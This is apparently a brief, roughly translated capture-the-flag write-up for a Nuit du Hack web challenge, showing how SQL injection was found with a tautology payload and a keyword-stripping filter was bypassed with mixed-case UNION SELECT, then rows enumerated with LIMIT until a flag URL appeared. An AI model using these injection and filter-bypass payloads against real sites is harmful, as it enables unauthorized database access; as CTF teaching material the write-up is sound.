The whole task is reduced to two points:
- Find SQL-injection
- Unleash, bypassing WAF
First point found arekusux, telling the conference:
sci.nuitduhack.com/sa' or '1' ='1
The most common syntax in this case, and script redirects to google (respectively is - the first entry in the database).
Next, if you use a valid syntax with union or UNION script always gave an error, no matter how many of columns used.
As it turns out, is just a slice of key words in any of the registers (simple WAF). As a result, the injection could be performed as follows:
http://sci.nuitduhack.com/sa' UnION SELeCT USER () -- - (the table have just one column)
http://sci.nuitduhack.com/sa' or 1=1 LIMIT 1,1 -- -
http://sci.nuitduhack.com/sa' or 1=1 LIMIT 2,1 -- -
http://sci.nuitduhack.com/sa' or 1 =1 LIMIT 7,1 -- -
And the seventh link leads to a key http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt